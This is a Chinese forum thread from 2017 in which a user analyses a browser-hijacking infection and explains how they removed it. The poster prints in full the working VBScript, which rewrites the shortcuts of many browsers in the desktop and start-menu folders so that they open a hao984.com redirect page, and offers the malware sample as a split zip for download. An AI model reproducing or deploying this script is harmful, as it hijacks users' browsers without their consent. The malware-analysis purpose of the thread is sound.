对一个浏览器劫持的解决,比较开心
本帖最后由 liuyuntianxia12 于 2017-1-12 11:12 编辑昨天手贱,用了这个(原因都懂...)http://www.52pojie.cn/thread-566605-1-1.html
知道会劫持浏览器(早先用过),但是又手贱啦,用火绒杀毒删除了查找到的vbs文件
重点来了,然后重启,电脑进入系统时就会关闭屏幕,然后风扇狂转不止
本人不是大神,只是个懂点基本电脑知识的小白,具体原因不明
强制重启后进入安全模式,还原最近记录点,然后一切OK
以下是参考网上多种教程在虚拟机尝试得到的内容:
程序运行会自动再windows目录添加这两个文件:
修改快捷方式:
IE相关快捷方式路径:
C:\Users\你的用户名\AppData\Roaming\Microsoft\Windows\Start Menu\Programs
C:\Users\你的用户名\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch
添加VBScript:
这是火绒扫描到的威胁
上面病毒的描述
被劫持的浏览器快捷方式(参照上面的路径自行修改)
使用wmitool查看编辑VBScript
集体参考 http://www.52pojie.cn/thread-564599-1-1.html?winzoom=1
从这里查看脚本的内容
这就是火绒看到的威胁文件,删除即可
贴一下脚本内容:
On Error Resume Next:Const link = "http://hao984.com/?r=xlgstdpjgjxx&m=v5":Const link360 = "http://hao984.com/?r=xlgstdpjgjxx&m=v5&s=3":browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe":lnkpaths = "C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\WHFP\Desktop,C:\Users\WHFP\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\WHFP\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\WHFP\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\WHFP\AppData\Roaming\Microsoft\Windows\Start Menu\Programs":browsersArr = split(browsers,","):Set oDic = CreateObject("scripting.dictionary"):For Each browser In browsersArr:oDic.Add LCase(browser), browser:Next:lnkpathsArr = split(lnkpaths,","):Set oFolders = CreateObject("scripting.dictionary"):For Each lnkpath In lnkpathsArr:oFolders.Add lnkpath, lnkpath:Next:Set fso = CreateObject("Scripting.Filesystemobject"):Set WshShell = CreateObject("Wscript.Shell"):For Each oFolder In oFolders:If fso.FolderExists(oFolder) Then:For Each file In fso.GetFolder(oFolder).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:Set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:If LCase(name) = LCase("360se.exe") Then:oShellLink.Arguments = link360:Else:oShellLink.Arguments = link:End If:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If:Next:
有没有大神解释下脚本...
这是流氓软件:
下载后
流氓软件(001).zip重命名为流氓软件.zip.001
流氓软件(002).zip重命名为流氓软件.zip.002
然后用解压软件打开001
请在虚拟机中尝试,产生的一切后果自己承担
本帖最后由 注册一下帐号 于 2017-1-12 11:44 编辑
liuyuntianxia12 发表于 2017-1-12 11:05
帖子已更新附件
你这个现象应该是这个东西只是改了浏览器。。
黑屏和驱动那个你是不是使用小马激活了?
上传一下这个吧
-------------------------------------------
还有C:\Users\用户名\AppData\Local\Microsoft\Windows\Explorer\
下面是不是有dll文件,传一下 liuyuntianxia12 发表于 2017-3-2 17:09
实在不行就参考这个帖子http://www.52pojie.cn/thread-578669-1-1.html
用这个软件试一下,注意选择选项
多谢,已经解决了,刚开始以为把脚本内容清空就可以了,结果还是会修改。现在把脚本彻底删掉,没再提示过被修改。 根据描述 环境过程无法清晰 现场无法还原 愚无尽 发表于 2017-1-12 09:46
根据描述 环境过程无法清晰 现场无法还原
正在虚拟机中尝试还原,基本找到了问题,待会贴下截图 厉害呀,怎么回事啊啊???? 等待结果 看看是什么东西 样本下载不到了,楼主能上传一下吗{:1_921:} 注册一下帐号 发表于 2017-1-12 10:33
样本下载不到了,楼主能上传一下吗
帖子已更新附件 很是困扰浏览器被劫持,特别是还串改了我的首页 leahdizon 发表于 2017-1-12 11:10
很是困扰浏览器被劫持,特别是还串改了我的首页
参考上面改,基本就没问题了